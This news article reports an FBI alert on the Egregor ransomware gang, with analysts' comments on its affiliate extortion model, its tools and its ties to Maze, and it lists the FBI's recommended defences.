FBI Issues Alert on Growing Egregor Ransomware ThreatBureau and Security Experts Warn About Gang's Effective Extortion Model
The FBI issued a warning this week over the growing threat from the operators behind the Egregor ransomware variant and other cybercriminal gangs affiliated with the group.
The alert notes that, since September, the Egregor gang and its affiliates claim to have compromised approximately 150 corporate networks in the U.S. and other countries. In some cases, the extortion demands have reached $4 million, according to a previous report by cybersecurity firm Group-IB.
In addition to acting on its own, Egregor has affiliated cybercriminals that carry out their own attacks and receive a percentage of the ransom if the money is paid by the victim. This makes defending and mitigating against these types of attacks difficult.
"Because of the large number of actors involved in deploying Egregor, the tactics, techniques and procedures used in its deployment can vary widely, creating significant challenges for defense and mitigation," the FBI alert notes. "Egregor ransomware utilizes multiple mechanisms to compromise business networks, including targeting business network and employee personal accounts that share access with business networks or devices."
Other researchers have noted that Egregor is one of several cybercriminal operations that exfiltrates data before crypto-locking systems and files and then threatens to leak the information unless it receives a ransom from the victim. The now-defunct Maze group began using this tactic in November 2019, after which more than a dozen other operators - including the REvil, aka Sodinokibi, gang - followed suit.
While fairly new, the Egregor gang and its affiliates have been tied to several high-profile attacks over the past five months, including those that targeted a Canadian public transportation agency and a Dutch human resources and staffing firm in December. The ransomware is also believed to have compromised the networks of Barnes & Noble and Kmart (see: Egregor Ransomware Slams HR Firm and Transport Agency).
The FBI alert notes that the operators behind Egregor typically use phishing emails with malicious attachments or links as the initial attack vector. The gang also exploits vulnerabilities in Microsoft's Remote Desktop Protocol tool and VPNs to gain initial access before moving laterally throughout the network.
Once the network is compromised, Egregor deploys legitimate penetration testing tools, such as Cobalt Strike, Advanced IP Scanner and AdFind, to escalate administrative privileges and move laterally through a network.
The gang or its affiliates also use tools such as Rclone, which is sometimes hidden or renamed as a service host process dubbed "svchost," and 7-Zip to steal and exfiltrate data before the final ransomware payload is delivered and files are encrypted, according to the FBI.
"There are a couple of unusual things about Egregor," says Brett Callow, a threat analyst at security firm Emsisoft. "First, it can spit out the ransom note on any connected printer - which seems like a somewhat odd move as it often results in incidents quickly becoming public knowledge, meaning companies no longer have the incentive to pay quickly and quietly to avoid publicity. "Secondly, the group initially racked up victims at an unprecedented rate. This is probably because multiple threat actors joined Egregor’s affiliate program after the Maze group ended its operation, taking with them details of compromised networks that had yet to be exploited."
And while Egregor's operators have developed methods to hide their tactics and techniques - and have also made the source code difficult to analyze - Callow says that the ransomware acts much like other crypto-locking malware.
Jamie Hart, a cyberthreat intelligence analyst at security firm Digital Shadows, says Egregor shares many similarities with the now-defunct Maze ransomware gang, targeting the same types of victims and using similar language in their ransomware notes.
"Significant similarities in the profiles of their victims and analysis of ransom notes indicate that the Maze ransomware operators, which closed operations in October 2020, are now running the Egregor ransomware variant," Hart says. "Although neither group has confirmed this theory, the timeline of Maze calling it quits is interestingly coincidental to Egregor taking off. Activity conducted by Egregor suggests the operators are extremely sophisticated and likely have experience in the ransomware landscape."
The FBI says organizations can take several steps to mitigate the risk of Egregor and other ransomware attacks, including:
- Backing up critical data offline;
- Ensuring that copies of critical data are in the cloud or on an external hard drive or storage device;
- Securing backups and ensuring data is not accessible for modification or deletion from the system where the data resides;
- Using two-factor authentication;
- Prioritizing patching of public-facing remote access products and applications, including recent RDP vulnerabilities such as CVE-2020-0609, CVE-2020-0610 and CVE-2020-16896;
- Reviewing suspicious BAT and DLL files with recon data and exfiltration tools.
The FBI also notes that those who are targeted by ransomware should not pay the ransom because that could encourage additional criminal activity. The U.S. Department of the Treasury has also warned organizations not to pay ransoms, noting they could face sanctions (see: Treasury Dept. Warns Against Facilitating Ransom Payments).